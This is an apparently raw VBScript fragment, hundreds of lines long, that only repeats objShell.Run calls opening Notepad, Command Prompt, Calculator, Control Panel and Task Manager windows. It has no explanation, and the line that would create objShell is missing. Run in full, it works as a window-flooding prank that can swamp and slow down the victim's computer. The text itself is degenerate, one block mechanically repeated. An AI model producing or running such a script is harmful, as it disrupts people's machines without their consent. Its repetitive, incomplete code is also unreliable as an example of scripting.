objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
